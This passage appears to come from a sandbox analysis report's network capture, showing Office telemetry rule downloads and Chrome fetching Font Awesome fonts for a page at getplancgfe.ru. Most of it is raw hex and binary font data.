                                                                                        2024-11-01 12:46:57 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        111192.168.2.44987313.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:57 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:57 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:57 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 419
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                        ETag: "0x8DC582BA6CF78C8"
                                                                                        x-ms-request-id: 38f7f1e0-301e-006e-2f08-2cf018000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124657Z-16ccfc498978mvxwhC1DFWafzn00000000m000000000p21h
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:57 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        112192.168.2.44987213.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:57 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:57 UTC491INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:57 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 474
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                        ETag: "0x8DC582BA4037B0D"
                                                                                        x-ms-request-id: e3e0e02d-201e-003f-52b1-2b6d94000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124657Z-16dc884887bkpzdnhC1DFWbc3n00000000mg00000000bn85
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache-Info: L1_T2
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:57 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        113192.168.2.449876104.17.24.144435772C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:58 UTC651OUTGET /ajax/libs/font-awesome/6.5.0/webfonts/fa-solid-900.woff2 HTTP/1.1
                                                                                        Host: cdnjs.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        Origin: https://getplancgfe.ru
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: cross-site
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: font
                                                                                        Referer: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-11-01 12:46:58 UTC977INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:58 GMT
                                                                                        Content-Type: application/octet-stream; charset=utf-8
                                                                                        Content-Length: 156532
                                                                                        Connection: close
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Cache-Control: public, max-age=30672000
                                                                                        ETag: "656632a7-26374"
                                                                                        Last-Modified: Tue, 28 Nov 2023 18:34:15 GMT
                                                                                        cf-cdnjs-via: cfworker/kv
                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                        Timing-Allow-Origin: *
                                                                                        X-Content-Type-Options: nosniff
                                                                                        CF-Cache-Status: HIT
                                                                                        Age: 675535
                                                                                        Expires: Wed, 22 Oct 2025 12:46:58 GMT
                                                                                        Accept-Ranges: bytes
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Tg8x%2FMhXMyu8301ooDN89892cr1Iia3Ma65GqgwVcwybdhUJOlnQyjgFOsLAKkFnNRnyAjX5%2BwWX7XCrWP7vxSb4Wp6z6HpdVd6hFN9haf2acDhObxDASYFmHEs8fS%2Bb5GaTuLHu"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                        Strict-Transport-Security: max-age=15780000
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8dbbfd9dac4f2e24-DFW
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2024-11-01 12:46:58 UTC392INData Raw: 77 4f 46 32 00 01 00 00 00 02 63 74 00 0a 00 00 00 06 1a 41 00 02 63 28 03 05 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 36 02 24 04 20 06 60 03 ab 3c 00 81 91 02 ca 96 c2 5c cb ab 40 05 87 6d 07 20 25 20 0d 93 95 01 50 58 9d 00 00 e8 fa 36 1e 46 a4 68 f6 f0 14 91 b3 5e 0f 80 aa aa aa aa aa 66 25 04 1c d7 b6 bd aa 2a 00 08 7e f4 93 9f fd e2 57 bf f9 dd 1f fe f4 17 7f f5 37 7f f7 0f ff f4 2f ff f6 1f ff f5 3f ff f7 9f 02 83 71 f7 0f 84 69 d9 8e cb ed f1 fa fc 86 ff 68 bf d7 73 27 40 b4 49 0a c2 f3 44 95 15 ca 56 d5 46 d8 29 28 56 b2 8a 60 fd 37 aa 42 07 df a7 f1 1f 75 e9 b3 ec 0b 00 4a a7 f3 fb 49 19 55 9c 80 39 45 de 11 60 4d b7 8e cd 5a 66 95 d1 c8 ff a9 98 52 0e 26 9a 74 26 26 d2 6a 8b 8a f9 cb 2d a2 95 24 d3 17 c0 22 3b a8 3a
                                                                                        Data Ascii: wOF2ctAc(6$ `<\@m % PX6Fh^f%*~W7/?qihs'@IDVF)(V`7BuJIU9E`MZfR&t&&j-$";:
                                                                                        2024-11-01 12:46:58 UTC1369INData Raw: 5e 20 c5 8d 55 c2 bf 25 8a 17 e1 93 b8 a8 45 20 f7 7f 09 70 7a 26 f8 13 4d ad be 5e 35 54 57 77 41 63 95 64 d9 96 ac b6 ba 1d 43 ac b2 a4 ee 84 95 8c e7 36 59 cc cd 12 79 89 b3 9c 65 dd 0c 2f 66 8e 50 0b c4 3a e2 1c b1 76 f7 00 ff 5f 42 e9 88 b4 d4 ba 7a 42 4f 4f cf f4 84 84 b0 00 06 98 05 66 37 63 76 16 98 bd db 3b de 5c de cb 60 3a ee 31 88 20 8f 62 48 5a 89 e2 91 22 45 11 54 24 45 85 35 69 45 cb 14 14 79 14 65 f9 94 29 d1 22 a1 10 6d cb f7 a6 43 7a 7b 9d f2 59 72 90 1c b0 ff 3f 69 6a fd bb af c2 ab 57 e1 55 48 08 0d a0 80 02 50 40 77 a3 1b d5 68 a0 3a b0 c9 22 d9 14 49 2b b0 ad 44 52 92 2d 28 51 94 e5 00 af 34 72 a0 03 e4 28 c9 bb 52 3b 48 43 67 38 d3 61 77 7b c6 49 b6 bc 63 38 c5 c3 99 2c 7b f7 7f 4c 96 35 89 93 82 aa 8f c8 52 ad ab 67 ba 7b ba 67 a6
                                                                                        Data Ascii: ^ U%E pz&M^5TWwAcdC6Yye/fP:v_BzBOOf7cv;\`:1 bHZ"ET$E5iEye)"mCz{Yr?ijWUHP@wh:"I+DR-(Q4r(R;HCg8aw{Ic8,{L5Rg{g
                                                                                        2024-11-01 12:46:58 UTC1369INData Raw: b6 e6 f6 fb a4 c1 88 e9 33 59 ee 8b 7f cf 02 d3 43 9f b9 c6 d3 ca 8e d9 e7 d7 2d 3f 23 1b 04 ff aa 75 23 bb fa 69 5c 0b cf 77 f5 69 69 7c 4b c9 8e d6 75 ee 1c 67 63 5f 25 fa a9 be d9 e8 3e 35 3e cb ac d9 b3 c0 54 d9 b6 1c b3 d8 37 c1 33 02 7b 3f 13 ae c8 b7 75 89 75 b6 a5 ab ee 87 19 53 a6 8f ea d1 dd 9b 33 bd ef 8b c3 06 fc 41 e5 d1 b5 05 c8 91 77 bf b7 ca 19 18 6a 41 bc 07 23 b9 b3 64 ce 9d 85 ac 8e 06 dd 2c 8f 9f 9c ec ca 6d 7e b7 1a e7 69 03 bd d6 c0 0f 93 67 2a 98 36 5b 3d de 45 aa d9 e4 77 44 ff 52 ce a2 f6 b3 b7 a7 5d e6 eb 59 9b ab 26 f5 9e e1 d0 65 6b 78 71 6d 94 fa 52 f8 7b 3b e6 e3 71 52 a7 cc 87 96 ab a9 6f 23 be fd 59 d5 3c f6 fe 33 3e 49 cd 2b e5 5b 8f 13 6a 6a fc 5c a8 9a cd 79 34 03 b7 7f 81 e3 a0 47 2b 78 c5 ba 0d 9c c5 d7 9c f6 3e 37 3f
                                                                                        Data Ascii: 3YC-?#u#i\wii|Kugc_%>5>T73{?uuS3AwjA#d,m~ig*6[=EwDR]Y&ekxqmR{;qRo#Y<3>I+[jj\y4G+x>7?
                                                                                        2024-11-01 12:46:58 UTC1369INData Raw: fb d3 fe b6 ff 62 77 c2 fd e1 d5 b0 3a 7c 16 fe 0e ff 10 f4 e8 33 60 26 73 59 4a cd 28 2d 43 d6 62 1d d6 63 7d b6 60 4b b6 a7 63 47 0e e1 50 0e e3 70 8e e0 48 8e e7 04 56 71 31 97 70 39 57 72 15 57 73 0d d7 72 1d 37 71 2b 77 70 17 f7 f3 00 0f f2 10 0f f3 08 8f f2 18 8f f3 04 4f f2 14 2f f2 0e ef f2 31 9f f0 29 5f f0 25 5f f1 3b 7f f1 af 40 94 04 12 91 44 49 92 64 49 91 74 c9 94 2c c9 96 1c c9 95 3c 29 15 23 0d a5 b3 74 95 6e d2 43 fa 4a 3f e9 2f 03 65 9c 6c 91 ad b2 ad b2 49 65 d3 da a9 b5 8b 6b 97 d4 8e d5 ee 55 13 57 83 87 e8 26 8e 29 6d 06 98 09 66 91 59 62 36 9b 6d 66 9f 39 68 8e 9a 9b e6 91 79 69 9c e4 96 62 52 4a ea 48 5b e9 2c dd 65 a8 8c 97 99 b2 54 36 c9 2e 39 26 e7 e4 92 dc 95 fb f2 50 3e ca 17 f9 2e ff 6d 64 9b c6 66 b7 c5 ed 64 bb cc 1e b4 47
                                                                                        Data Ascii: bw:|3`&sYJ(-Cbc}`KcGPpHVq1p9WrWsr7q+wpO/1)_%_;@DIdIt,<)#tnCJ?/elIekUW&)mfYb6mf9hyibRJH[,eT6.9&P>.mdfdG
                                                                                        2024-11-01 12:46:58 UTC1369INData Raw: e7 e7 02 5c 84 8b 72 49 2e c5 55 b8 2a 2f e3 4d bc 9d f7 f2 31 3e c9 67 f9 12 df e2 07 fc 98 a9 1f e7 16 79 ec d9 25 8f 14 94 52 52 6e 55 cd a4 b5 74 90 ae d2 5d fa b0 a1 d1 32 4e 26 c9 14 99 25 2b 65 b5 6c 66 fc e4 dc ae 6d f5 41 42 b6 fc 29 6a 6f f2 1f f1 90 10 c9 e7 cc 8d 7c 28 88 72 5f a6 09 5a a2 2d 3a a2 0f fa 61 10 86 62 3c 26 63 1a 66 62 3e 96 b1 f1 9b b0 15 db b1 07 07 70 02 67 70 01 97 70 15 d7 71 07 f7 d9 ea 15 02 3d b3 5b b8 8b ea 62 f4 13 b9 a4 2e c5 bc f1 50 bc 3f f5 e7 ec 9f f3 e6 72 fc ef 6a fe 7f f8 ff 83 ff ef fc 7f e3 ff 6b f8 63 13 a6 40 e9 02 45 0b 14 8c df e2 fd 78 31 1e 8f c7 e2 8e b8 2d 6e 8d 9b e3 06 20 2e 8c b3 e3 8c 58 29 96 8e 25 62 9e 98 2e a6 f4 ff fd b3 bf f6 47 7e c3 cf f8 69 3f e0 3b 7d 9b 6f f2 8d be c1 57 f8 62 5f e8 b3
                                                                                        Data Ascii: \rI.U*/M1>gy%RRnUt]2N&%+elfmAB)jo|(r_Z-:ab<&cfb>pgppq=[b.P?rjkc@Ex1-n .X)%b.G~i?;}oWb_
                                                                                        2024-11-01 12:46:58 UTC1369INData Raw: cb b4 11 80 0d 0b b3 00 e3 43 7b f1 70 cf 22 0c 69 bf 79 6f 57 77 e9 2e 1c f2 43 a6 3f 5b 5a 83 b3 6a 52 78 3a 5a 87 7a 1c ff c4 b4 e3 c0 8e 01 3b 04 6c 2f 3c 4a df c3 15 dc 41 69 f5 e4 af 6b 43 38 89 8c 1a 34 a6 09 4d 69 46 73 5a d0 92 56 b4 a6 0d 6d 69 47 7b 3a d0 91 12 65 aa c8 a9 a6 42 50 d0 89 ce 74 a1 2b dd e8 4e 0f 7a 72 2d f7 d8 e5 76 85 5d 69 d7 d9 f5 76 93 dd 62 b7 da 5d 76 9f 3d 61 4f da 53 f6 96 bd 6f 1f d8 87 f6 91 7d 6c 9f d8 a7 f6 b9 7d 61 5f da 37 f6 ad 7d 67 3f d9 cf f6 8b fd 6a 7f da 0c 9b 63 8b 6c b1 ad b2 d5 42 35 d5 5c 2d d5 56 b9 ba ab 87 7a a9 bf 06 68 a0 86 6a b8 c6 6a 9c c6 6b 92 26 6b 8a a6 6a 5b 6d a7 1d b4 93 76 d5 b1 3a 59 a7 ea 0c 9d ad 0b 74 a1 2e d2 c5 ba 44 97 ea 32 5d ae eb 74 bd 6e d3 ed ba 57 8f e8 49 bd a9 77 f4 a1 be
                                                                                        Data Ascii: C{p"iyoWw.C?[ZjRx:Zz;l/<JAikC84MiFsZVmiG{:eBPt+Nzr-v]ivb]v=aOSo}l}a_7}g?jclB5\-Vzhjjk&kj[mv:Yt.D2]tnWIw
                                                                                        2024-11-01 12:46:58 UTC1369INData Raw: 3b 50 af 05 3b 52 6f 0d 3b 51 ef 08 3b 53 ef 0a bb 50 1f bc 1c bb 52 1f 43 7d 6c ff ab ae 4f 77 39 f6 a0 be 88 fa e2 3e 57 5d df 20 ec 4d 7d 07 ec 43 fd 08 ec 4b fd 0c ec 47 fd 02 ec 4f fd 36 1c 40 fd 2e 1c 48 fd 3e 1c 44 fd 3d 1c 4c fd 33 1c 42 fd 1b 1c 4a fd 1f 1c 46 6f f0 08 0e a7 37 15 bd a9 71 04 bd 59 81 a3 e8 2d 0a 47 d3 3b 11 8e a1 77 09 1c 4b ef 7e 38 8e de c3 70 3c bd 67 e1 04 7a 2f 8d e0 44 7a af d2 7b 0d 27 d1 fb 02 38 85 de b7 70 2a 7d 93 c3 69 f4 dd 3e 82 d3 e9 bb 93 be bb 70 06 7d bf 02 67 d1 2c 02 67 d3 2c 3b 82 73 68 96 a7 59 01 e7 d2 ec 02 9c 4f b3 f7 57 74 01 cd 7e 34 fb e3 42 9a 83 68 0e c6 c5 34 67 00 97 d2 9c 03 97 d1 5c fb 15 5d 4e 73 03 cd ad b8 82 e6 76 9a 3b 70 1d cd dd 2c c7 0d 34 f7 d2 bc d2 cf fd 89 9a d7 68 3e c3 93 34 15 cd
                                                                                        Data Ascii: ;P;Ro;Q;SPRC}lOw9>W] M}CKGO6@.H>D=L3BJFo7qY-G;wK~8p<gz/Dz{'8p*}i>p}g,g,;shYOWt~4Bh4g\]Nsv;p,4h>4
                                                                                        2024-11-01 12:46:58 UTC1369INData Raw: 79 d9 e8 25 b1 36 65 d3 88 58 87 b2 39 65 0b 62 5d ca 61 48 37 37 e5 f0 88 6e 1e ca d1 94 63 88 f5 29 a7 22 b1 21 e5 aa 82 d8 88 f2 30 e5 91 f1 58 5e 1e 53 62 53 ca 53 12 9b 51 9e 8b 88 cd 29 2f 51 5e 21 b6 a0 bc 86 c4 d6 94 8f 24 b6 a1 7c 2a b1 2d e5 2b 89 ed 28 3f 45 c4 f6 94 bf 28 7f 13 3b 50 fe 45 fa 33 29 ff 4b ec 44 1d 24 b1 33 75 54 89 5d a8 93 4b ec 4a 9d 52 62 37 ea 54 05 31 15 75 76 ea 9c 4f e7 f2 3a b7 05 b1 17 75 3e ea fc cf e0 f2 ba a0 12 fb 52 17 91 d8 8f ba 98 c4 fe d4 25 24 0e a0 2e 25 71 20 75 19 89 83 a8 2b 48 1c 4c 5d 59 e2 10 ea aa 12 87 52 d7 90 38 8c ba 6e 41 1c 4e dd 90 ba d1 b8 37 af 9b 18 11 47 51 37 a3 6e 4e 1c 4d dd 9a 92 71 2c 75 5b ea 4e c4 71 d4 5d a9 bb 13 a7 50 f7 24 22 4e a7 ee 43 dd 8f 38 83 7a 10 05 dd 42 d4 83 a9 87 dc
                                                                                        Data Ascii: y%6eX9eb]aH77nc)"!0X^SbSSQ)/Q^!$|*-+(?E(;PE3)KD$3uT]KJRb7T1uvO:u>R%$.%q u+HL]YR8nAN7GQ7nNMq,u[Nq]P$"NC8zB
                                                                                        2024-11-01 12:46:58 UTC1369INData Raw: e6 7c 14 1a 13 db 11 85 16 c4 65 14 5a 12 57 a0 d0 9a 78 8f 42 1b e2 4b a0 d0 9e f8 51 28 74 26 f6 01 14 ba 10 73 0b 0a 3d 88 1f 87 c2 58 a2 7f 50 98 40 dc 01 14 26 7a 3c ac 92 f8 d1 28 ac 21 ae 1e 0a db 88 ed 87 c2 4e 62 1f 47 61 17 71 dd 50 38 9c e8 63 14 8e 20 e6 55 14 ce 24 e6 4a 14 ce 25 f6 3e 14 ce 27 76 09 0a 97 10 9d 84 c2 a5 c4 ec 40 e1 5a a2 cb 51 b8 8e d8 3f 51 b8 99 b8 f3 51 b8 83 d8 4f 51 b8 9b e8 58 14 1e 23 76 1b 0a 8f 13 33 0b 85 27 88 ef 8c c2 93 c4 7d 87 c2 d3 c4 cd 46 e1 19 a2 bf 50 78 8e d8 83 28 bc 40 dc 36 14 5e 26 e6 13 14 5e 23 f6 68 14 de 24 f6 28 14 de 22 ee 2b 14 de 21 6e 37 0a ef 13 77 39 0a 1f 12 77 3b 0a 9f 11 9d 8b c2 17 c4 5c 83 c2 d7 c4 f4 47 e1 3b e2 c6 a1 f0 23 71 06 85 48 74 19 0a 87 88 ae 45 d1 11 f7 3a 8a a5 88 7b 19
                                                                                        Data Ascii: |eZWxBKQ(t&s=XP@&z<(!NbGaqP8c U$J%>'v@ZQ?QQOQX#v3'}FPx(@6^&^#h$("+!n7w9w;\G;#qHtE:{
                                                                                        2024-11-01 12:46:58 UTC1369INData Raw: c8 8d 13 76 42 6e 92 f8 e3 68 f4 34 e2 9f 8b 46 4f 27 de 2c 34 7a 39 31 6f a0 d1 1b 89 f1 d1 e8 33 c4 ff 19 8d ae fd 4f 8a b9 98 12 4c b5 b5 5c 6d ca 44 24 6c c8 30 e4 79 90 d7 b3 9e b4 d1 d7 a8 67 41 9e d6 d3 9e 2c c8 fb 1a 7d 69 96 0f 34 f3 2c 6b e6 9b 67 b5 b4 96 f6 64 e5 a0 1c 6c 9e 0d d6 07 eb 3d 0b 5b ad 56 ab fe e4 93 4f b6 46 96 8f 8c 8c 8c 34 9e 7c f2 c9 91 d6 e4 0f 8a e2 44 9b 25 71 24 45 71 32 f9 55 12 47 9a 5d 14 45 31 f9 df ec a2 68 17 45 a1 ce a2 5d 14 dd 49 1c 49 51 9c 4c 1e 92 c4 91 14 c5 89 6e 03 f0 a6 fe 9d fa 8a 9d 75 1b 55 b6 80 e9 33 ea 59 36 d8 b7 45 50 ae f6 64 49 5a 6b 0c e5 cd e1 1e bf 99 37 eb 83 f5 72 50 4e 6b e9 c2 30 8c e3 30 0c c3 38 0e c3 cd d2 ce 4a a5 33 4d 3b 2b 95 ce 54 cb e3 30 0c c3 78 8a 38 0c c3 30 16 93 87 68 7a 92
                                                                                        Data Ascii: vBnh4FO',4z91o3OL\mD$l0ygA,}i4,kgdl=[VOF4|D%q$Eq2UG]E1hE]IIQLnuU3Y6EPdIZk7rPNk008J3M;+T0x80hz


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        114192.168.2.449877104.17.24.144435772C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:58 UTC652OUTGET /ajax/libs/font-awesome/6.5.0/webfonts/fa-brands-400.woff2 HTTP/1.1
                                                                                        Host: cdnjs.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        Origin: https://getplancgfe.ru
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: cross-site
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: font
                                                                                        Referer: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-11-01 12:46:58 UTC979INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:58 GMT
                                                                                        Content-Type: application/octet-stream; charset=utf-8
                                                                                        Content-Length: 116672
                                                                                        Connection: close
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Cache-Control: public, max-age=30672000
                                                                                        ETag: "656632a7-1c7c0"
                                                                                        Last-Modified: Tue, 28 Nov 2023 18:34:15 GMT
                                                                                        cf-cdnjs-via: cfworker/kv
                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                        Timing-Allow-Origin: *
                                                                                        X-Content-Type-Options: nosniff
                                                                                        CF-Cache-Status: HIT
                                                                                        Age: 585556
                                                                                        Expires: Wed, 22 Oct 2025 12:46:58 GMT
                                                                                        Accept-Ranges: bytes
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RU3zQXhxaEOkdl80w1zuUWwVaKQBAEkdH1w%2FTF1JsCVpuH0K1i6TV%2Ba4NA%2B0XQuXbbgftSoD1kq5a8c9k3zA6yBOJfVa%2FThcuM0tNdk3FnKrzKq4pl6ibr5d1IkSdiNK1VBJYnay"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                        Strict-Transport-Security: max-age=15780000
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8dbbfd9dbe4b6b07-DFW
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2024-11-01 12:46:58 UTC390INData Raw: 77 4f 46 32 00 01 00 00 00 01 c7 c0 00 0a 00 00 00 03 0e 91 00 01 c7 73 03 05 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 36 02 24 04 20 06 60 03 90 48 00 a5 56 ca 8b cc 10 cb 90 4c 05 88 1d 07 20 25 48 87 71 6a 08 dd 30 3d 00 00 b4 fa 79 50 46 f4 a4 d5 e2 01 50 55 55 4f 09 61 5e db f6 2a 20 fc f4 cb 6f 7f fc e5 6f ff f8 d7 7f fe f7 97 81 b1 3b 20 96 ed b8 9e 6f f8 ff 7e bf d7 75 f6 7f 2f c0 ec 62 93 f6 96 59 d6 75 2a e3 4b b7 a0 aa be 90 11 32 aa 80 77 fc 1f 5f 09 e8 82 70 96 d8 b4 ac 9d e8 31 d1 6e 2f a2 ce 8b 98 d3 09 2f 46 92 a3 74 f6 e5 01 e4 4f ec 65 2e d2 89 3a 81 e8 d4 dd b9 c9 3f 01 9e a7 9c e6 fb ce c6 aa bc 96 42 b2 55 e0 80 0a 34 01 a9 84 47 22 bb 40 37 e0 1b 91 4a c0 49 f6 54 5a 42 9e 91 c7 cb ff 87 33 fd 9f 3b a0 11
                                                                                        Data Ascii: wOF2s6$ `HVL %Hqj0=yPFPUUOa^* oo; o~u/bYu*K2w_p1n//FtOe.:?BU4G"@7JITZB3;
